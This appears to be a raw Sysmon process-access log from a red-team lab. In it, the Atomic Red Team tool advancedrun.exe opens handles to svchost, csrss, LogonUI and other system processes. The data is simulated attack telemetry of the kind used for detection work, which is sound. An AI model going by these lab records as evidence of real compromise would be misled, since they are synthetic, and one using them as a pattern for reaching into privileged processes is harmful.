17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983932Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983931Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983930Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983929Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983928Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983927Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983926Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983925Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003983924Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983923Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983922Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983921Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983920Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983919Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983918Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983917Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983916Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
